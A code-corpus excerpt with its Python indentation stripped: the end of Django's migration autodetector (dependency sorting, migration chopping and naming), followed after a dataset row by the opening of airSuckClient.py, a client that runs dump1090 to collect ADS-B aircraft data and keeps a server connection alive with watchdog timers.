self.generate_added_fields()
self.generate_altered_fields()
self.generate_altered_unique_together()
self.generate_altered_index_together()
self.generate_altered_db_table()
self.generate_altered_order_with_respect_to()
# Now, reordering to make things possible. The order we have already
# isn't bad, but we need to pull a few things around so FKs work nicely
# inside the same app
for app_label, ops in sorted(self.generated_operations.items()):
# construct a dependency graph for intra-app dependencies
dependency_graph = {op: set() for op in ops}
for op in ops:
for dep in op._auto_deps:
if dep[0] == app_label:
for op2 in ops:
if self.check_dependency(op2, dep):
dependency_graph[op].add(op2)
# we use a stable sort for deterministic tests & general behavior
self.generated_operations[app_label] = stable_topological_sort(ops, dependency_graph)
# Now, we need to chop the lists of operations up into migrations with
# dependencies on each other.
# We do this by stepping up an app's list of operations until we
# find one that has an outgoing dependency that isn't in another app's
# migration yet (hasn't been chopped off its list). We then chop off the
# operations before it into a migration and move onto the next app.
# If we loop back around without doing anything, there's a circular
# dependency (which _should_ be impossible as the operations are all
# split at this point so they can't depend and be depended on)
self.migrations = {}
num_ops = sum(len(x) for x in self.generated_operations.values())
chop_mode = False
while num_ops:
# On every iteration, we step through all the apps and see if there
# is a completed set of operations.
# If we find that a subset of the operations are complete we can
# try to chop it off from the rest and continue, but we only
# do this if we've already been through the list once before
# without any chopping and nothing has changed.
for app_label in sorted(self.generated_operations.keys()):
chopped = []
dependencies = set()
for operation in list(self.generated_operations[app_label]):
deps_satisfied = True
operation_dependencies = set()
for dep in operation._auto_deps:
is_swappable_dep = False
if dep[0] == "__setting__":
# We need to temporarily resolve the swappable dependency to prevent
# circular references. While keeping the dependency checks on the
# resolved model we still add the swappable dependencies.
# See #23322
resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
original_dep = dep
dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
is_swappable_dep = True
if dep[0] != app_label and dep[0] != "__setting__":
# External app dependency. See if it's not yet
# satisfied.
for other_operation in self.generated_operations.get(dep[0], []):
if self.check_dependency(other_operation, dep):
deps_satisfied = False
break
if not deps_satisfied:
break
else:
if is_swappable_dep:
operation_dependencies.add((original_dep[0], original_dep[1]))
elif dep[0] in self.migrations:
operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
else:
# If we can't find the other app, we add a first/last dependency,
# but only if we've already been through once and checked everything
if chop_mode:
# If the app already exists, we add a dependency on the last migration,
# as we don't know which migration contains the target field.
# If it's not yet migrated or has no migrations, we use __first__
if graph and graph.leaf_nodes(dep[0]):
operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
else:
operation_dependencies.add((dep[0], "__first__"))
else:
deps_satisfied = False
if deps_satisfied:
chopped.append(operation)
dependencies.update(operation_dependencies)
self.generated_operations[app_label] = self.generated_operations[app_label][1:]
else:
break
# Make a migration! Well, only if there's stuff to put in it
if dependencies or chopped:
if not self.generated_operations[app_label] or chop_mode:
subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
instance.dependencies = list(dependencies)
instance.operations = chopped
self.migrations.setdefault(app_label, []).append(instance)
chop_mode = False
else:
self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
new_num_ops = sum(len(x) for x in self.generated_operations.values())
if new_num_ops == num_ops:
if not chop_mode:
chop_mode = True
else:
raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
num_ops = new_num_ops
# OK, add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
return self.migrations
def check_dependency(self, operation, dependency):
"""
Returns ``True`` if the given operation depends on the given dependency,
``False`` otherwise.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower() and
any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name_lower == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name_lower == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Field is removed and part of an index/unique_together
elif dependency[2] is not None and dependency[3] == "foo_together_change":
return (
isinstance(operation, (operations.AlterUniqueTogether,
operations.AlterIndexTogether)) and
operation.name_lower == dependency[1].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
def generate_renamed_models(self):
"""
Finds any renamed models, and generates the operations for them,
and removes the old entry from the model lists.
Must be run before other model-level generation.
"""
self.renamed_models = {}
self.renamed_models_rel = {}
added_models = set(self.new_model_keys) - set(self.old_model_keys)
for app_label, model_name in sorted(added_models):
model_state = self.to_state.models[app_label, model_name]
model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
removed_models = set(self.old_model_keys) - set(self.new_model_keys)
for rem_app_label, rem_model_name in removed_models:
if rem_app_label == app_label:
rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
if model_fields_def == rem_model_fields_def:
if self.questioner.ask_rename_model(rem_model_state, model_state):
self.add_operation(
app_label,
operations.RenameModel(
old_name=rem_model_state.name,
new_name=model_state.name,
)
)
self.renamed_models[app_label, model_name] = rem_model_name
self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
self.old_model_keys.remove((rem_app_label, rem_model_name))
self.old_model_keys.append((app_label, model_name))
break
def generate_created_models(self):
"""
Find all new models (both managed and unmanaged) and make create
operations for them as well as separate operations to create any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also defer any model options that refer to collections of fields
that might be deferred (e.g. unique_together, index_together).
"""
old_keys = set(self.old_model_keys).union(self.old_unmanaged_keys)
added_models = set(self.new_model_keys) - old_keys
added_unmanaged_models = set(self.new_unmanaged_keys) - old_keys
all_added_models = chain(
sorted(added_models, key=self.swappable_first_key, reverse=True),
sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
)
for app_label, model_name in all_added_models:
model_state = self.to_state.models[app_label, model_name]
model_opts = self.new_apps.get_model(app_label, model_name)._meta
# Gather related fields
related_fields = {}
primary_key_rel = None
for field in model_opts.local_fields:
if field.rel:
if field.rel.to:
if field.primary_key:
primary_key_rel = field.rel.to
elif not field.rel.parent_link:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model_opts.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Are there unique/index_together to defer?
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
# Depend on the deletion of any possible proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Depend on the other end of the primary key if it's a relation
if primary_key_rel:
dependencies.append((
primary_key_rel._meta.app_label,
primary_key_rel._meta.object_name,
None,
True
))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[d for d in model_state.fields if d[0] not in related_fields],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
dependencies=dependencies,
beginning=True,
)
# Don't add operations which modify the database for unmanaged models
if not model_opts.managed:
continue
# Generate operations for each related field
for name, field in sorted(related_fields.items()):
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True
))
# Depend on our own model being created
dependencies.append((app_label, model_name, None, True))
# Make operation
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=name,
field=field,
),
dependencies=list(set(dependencies)),
)
# Generate other opns
related_dependencies = [
(app_label, model_name, name, True)
for name, field in sorted(related_fields.items())
]
related_dependencies.append((app_label, model_name, None, True))
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=unique_together,
),
dependencies=related_dependencies
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=index_together,
),
dependencies=related_dependencies
)
if order_with_respect_to:
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=order_with_respect_to,
),
dependencies=[
(app_label, model_name, order_with_respect_to, True),
(app_label, model_name, None, True),
]
)
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
We use the same statements as that way there's less code duplication,
but of course for proxy models we can skip all that pointless field
stuff and just chuck out an operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
def generate_deleted_models(self):
"""
Find all deleted models (managed and unmanaged) and make delete
operations for them as well as separate operations to delete any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also bring forward removal of any model options that refer to
collections of fields - the inverse of generate_created_models().
"""
new_keys = set(self.new_model_keys).union(self.new_unmanaged_keys)
deleted_models = set(self.old_model_keys) - new_keys
deleted_unmanaged_models = set(self.old_unmanaged_keys) - new_keys
all_deleted_models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
for app_label, model_name in all_deleted_models:
model_state = self.from_state.models[app_label, model_name]
model = self.old_apps.get_model(app_label, model_name)
if not model._meta.managed:
# Skip here, no need to handle fields for unmanaged models
continue
# Gather related fields
related_fields = {}
for field in model._meta.local_fields:
if field.rel:
if field.rel.to:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model._meta.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Generate option removal first
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=None,
)
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=None,
)
)
# Then remove each related field
for name, field in sorted(related_fields.items()):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=name,
)
)
# Finally, remove the model.
# This depends on both the removal/alteration of all incoming fields
# and the removal of all its own related fields, and if it's
# a through model the field that references it.
dependencies = []
for related_object in model._meta.related_objects:
related_object_app_label = related_object.related_model._meta.app_label
object_name = related_object.related_model._meta.object_name
field_name = related_object.field.name
dependencies.append((related_object_app_label, object_name, field_name, False))
if not related_object.many_to_many:
dependencies.append((related_object_app_label, object_name, field_name, "alter"))
for name, field in sorted(related_fields.items()):
dependencies.append((app_label, model_name, name, False))
# We're referenced in another field's through=
through_user = self.through_users.get((app_label, model_state.name_lower), None)
if through_user:
dependencies.append((through_user[0], through_user[1], through_user[2], False))
# Finally, make the operation, deduping any dependencies
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
dependencies=list(set(dependencies)),
)
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
def generate_renamed_fields(self):
"""
Works out renamed fields
"""
self.renamed_fields = {}
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Scan to see if this is actually a rename!
field_dec = self.deep_deconstruct(field)
for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
if rem_app_label == app_label and rem_model_name == model_name:
old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
if field.rel and field.rel.to and 'to' in old_field_dec[2]:
old_rel_to = old_field_dec[2]['to']
if old_rel_to in self.renamed_models_rel:
old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
if old_field_dec == field_dec:
if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
self.add_operation(
app_label,
operations.RenameField(
model_name=model_name,
old_name=rem_field_name,
new_name=field_name,
)
)
self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
self.old_field_keys.add((app_label, model_name, field_name))
self.renamed_fields[app_label, model_name, field_name] = rem_field_name
break
def generate_added_fields(self):
"""
Fields that have been added
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
self._generate_added_field(app_label, model_name, field_name)
def _generate_added_field(self, app_label, model_name, field_name):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.rel and field.rel.to:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True,
))
# You can't just add NOT NULL fields with no default or fields
# which don't allow empty strings as default.
preserve_default = True
if (not field.null and not field.has_default() and
not isinstance(field, models.ManyToManyField) and
not (field.blank and field.empty_strings_allowed)):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
preserve_default = False
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self._generate_removed_field(app_label, model_name, field_name)
def _generate_removed_field(self, app_label, model_name, field_name):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an
# order_with_respect_to or index/unique_together operation;
# this is safely ignored if there isn't one
dependencies=[
(app_label, model_name, field_name, "order_wrt_unset"),
(app_label, model_name, field_name, "foo_together_change"),
],
)
def generate_altered_fields(self):
"""
Fields that have been altered.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
# Did the field change?
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(old_field_name)
new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Implement any model renames on relations; these are handled by RenameModel
# so we need to exclude them from the comparison
if hasattr(new_field, "rel") and getattr(new_field.rel, "to", None):
rename_key = (
new_field.rel.to._meta.app_label,
new_field.rel.to._meta.model_name,
)
if rename_key in self.renamed_models:
new_field.rel.to = old_field.rel.to
old_field_dec = self.deep_deconstruct(old_field)
new_field_dec = self.deep_deconstruct(new_field)
if old_field_dec != new_field_dec:
both_m2m = (
isinstance(old_field, models.ManyToManyField) and
isinstance(new_field, models.ManyToManyField)
)
neither_m2m = (
not isinstance(old_field, models.ManyToManyField) and
not isinstance(new_field, models.ManyToManyField)
)
if both_m2m or neither_m2m:
# Either both fields are m2m or neither is
preserve_default = True
if (old_field.null and not new_field.null and not new_field.has_default() and
not isinstance(new_field, models.ManyToManyField)):
field = new_field.clone()
new_default = self.questioner.ask_not_null_alteration(field_name, model_name)
if new_default is not models.NOT_PROVIDED:
field.default = new_default
preserve_default = False
else:
field = new_field
self.add_operation(
app_label,
operations.AlterField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
)
)
else:
# We cannot alter between m2m and concrete fields
self._generate_removed_field(app_label, model_name, field_name)
self._generate_added_field(app_label, model_name, field_name)
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = {
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
}
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
def generate_altered_unique_together(self):
self._generate_altered_foo_together(operations.AlterUniqueTogether)
def generate_altered_index_together(self):
self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_db_table(self):
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_db_table_name = old_model_state.options.get('db_table')
new_db_table_name = new_model_state.options.get('db_table')
if old_db_table_name != new_db_table_name:
self.add_operation(
app_label,
operations.AlterModelTable(
name=model_name,
table=new_db_table_name,
)
)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(
self.kept_proxy_keys
).union(
self.kept_unmanaged_keys
).union(
# unmanaged converted to managed
set(self.old_unmanaged_keys).intersection(self.new_model_keys)
).union(
# managed converted to unmanaged
set(self.old_model_keys).intersection(self.new_unmanaged_keys)
)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if (old_model_state.options.get("order_with_respect_to", None) !=
new_model_state.options.get("order_with_respect_to", None)):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to", None):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to', None),
),
dependencies=dependencies,
)
def generate_altered_managers(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.managers != new_model_state.managers:
self.add_operation(
app_label,
operations.AlterModelManagers(
name=model_name,
managers=new_model_state.managers,
)
)
def arrange_for_graph(self, changes, graph, migration_name=None):
"""
Takes in a result from changes() and a MigrationGraph,
and fixes the names and dependencies of the changes so they
extend the graph from the leaf nodes for each app.
"""
leaves = graph.leaf_nodes()
name_map = {}
for app_label, migrations in list(changes.items()):
if not migrations:
continue
# Find the app label's current leaf node
app_leaf = None
for leaf in leaves:
if leaf[0] == app_label:
app_leaf = leaf
break
# Do they want an initial migration for this app?
if app_leaf is None and not self.questioner.ask_initial(app_label):
# They don't.
for migration in migrations:
name_map[(app_label, migration.name)] = (app_label, "__first__")
del changes[app_label]
continue
# Work out the next number in the sequence
if app_leaf is None:
next_number = 1
else:
next_number = (self.parse_number(app_leaf[1]) or 0) + 1
# Name each migration
for i, migration in enumerate(migrations):
if i == 0 and app_leaf:
migration.dependencies.append(app_leaf)
if i == 0 and not app_leaf:
new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
else:
new_name = "%04i_%s" % (
next_number,
migration_name or self.suggest_name(migration.operations)[:100],
)
name_map[(app_label, migration.name)] = (app_label, new_name)
next_number += 1
migration.name = new_name
# Now fix dependencies
for app_label, migrations in changes.items():
for migration in migrations:
migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
but we put some effort in to the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name_lower
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name_lower
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name_lower for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
if re.match(r"^\d+_", name):
return int(name.split("_")[0])
return None
| bsd-3-clause |
ThreeSixes/airSuck | airSuckClient.py | 1 | 41255 | #!/usr/bin/python
"""
airSuckClient by ThreeSixes (https://github.com/ThreeSixes)
This project is licensed under GPLv3. See COPYING for dtails.
This file is part of the airSuck project (https://github.com/ThreeSixes/airSUck).
"""
###########
# Imports #
###########
try:
import config
except:
raise IOError("No configuration present. Please copy config/config.py to the airSuck folder and edit it.")
# Load the config _very_ early.
asConfig = config.airSuckClientSettings
# If we have an attached GPS...
if asConfig['gps']:
# Do GPS things.
from gps import *
import datetime
import json
import re
import socket
import time
import threading
import traceback
import Queue
import atexit
import signal
import sys
import errno
from libAirSuck import asLog
from subprocess import Popen, PIPE, STDOUT
from pprint import pprint
#########################
# dump1090Handler class #
#########################
class airSuckClient():
# Class consructor
def __init__(self):
"""
dump1090Handler handles the dump1090 executable to grab ADS-B, and makes sure it's running. If the process jams it's restarted.
"""
# Init message.
logger.log("Init airSuckClient...")
# Build the command we need to run dump1090 in a fashion Popen can understand.
self.popenCmd = [asConfig['dump1090Path']] + asConfig['dump1090Args'].split(" ")
# Pre-compiled regex used to verify dump1090 ADS-B data.
self.__re1090 = re.compile("[@*]([a-fA-F0-9])+;")
#self.__re1090Mlat = re.compile("[@*]([a-fA-F0-9])+;")
# Watchdog setup.
self.__myWatchdog = None
self.__lastADSB = 0
self.__watchdog1090Restart = False
self.__lastSrvKeepalive = 0
self.__keepAliveTimer = 0
self.__maxTimeSrv = 2.0 * asConfig['keepaliveInterval']
self.__keepaliveJSON = "{\"keepalive\": \"abcdef\"}"
# Backoff counters
self.__backoff1090 = 1.0
self.__backoffSrv = 1.0
# Networking.
self.__serverSock = None
self.__serverConnected = False
self.__rxBuffSz = 128
# Should we keep going?
self.__keepRunning = True
# Queue worker running?
self.__queueWorkerRunning = False
# RX watcher running?
self.__rxWatcherRunning = False
# Dump1090 running?
self.__dump1090Running = False
# Global dump1090 process holder.
self.__proc1090 = None
# GPSD stuff...
# Do we have an initial position?
self.__gpsdData = False
# Is there anything prohibiting the start of the GPS worker?
self.__startGpsWorker = asConfig['gps']
def __clientWatchdog(self):
"""
Master watchdog for the software client.
"""
# If we're connected to the server do the network checks.
if self.__serverConnected:
try:
# Check to see if we got data from dump1090.
if self.__lastSrvKeepalive >= self.__maxTimeSrv:
# Raise an exception.
raise IOError()
else:
# Increment our last entry.
self.__lastSrvKeepalive += 1
except IOError:
# Print the error message
logger.log("airSuck client watchdog: No keepalive for %s sec." %self.__maxTimeSrv)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
try:
# If we're connected.
if self.__serverConnected:
# If it's time to send the keepalive...
if self.__keepAliveTimer >= asConfig['keepaliveInterval']:
self.__keepAliveTimer = 0
if self.__keepAliveTimer == 0:
# Send the ping.
self.__send(self.__keepaliveJSON)
# Roll the keepalive timer.
self.__keepAliveTimer += 1
else:
# Reset the keeplaive timer.
self.__keepAliveTimer = 0
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
# Set flag indicating whether we restarted because of the watchdog.
self.__watchdog1090Restart = False
# If we're running dump1090 handle timing it out.
if asConfig['dump1090Enabled']:
try:
# Check to see if we got data from dump1090.
if self.__lastADSB >= asConfig['dump1090Timeout']:
# Set watchdog restart flag.
self.__watchdog1090Restart = True
try:
# Kill dump1090
self.__proc1090.kill()
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
# Do nothing in the event it fails.
pass
# Raise an exception.
raise IOError()
else:
# Increment our last entry.
self.__lastADSB += 1
except IOError:
# Print the error message
logger.log("airSuck client watchdog: No data from dump1090 in %s sec." %asConfig['dump1090Timeout'])
try:
# Stop dump1090.
self.__proc1090.kill()
except:
# Do nothing, since it won't die nicely in some cases.
pass
finally:
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
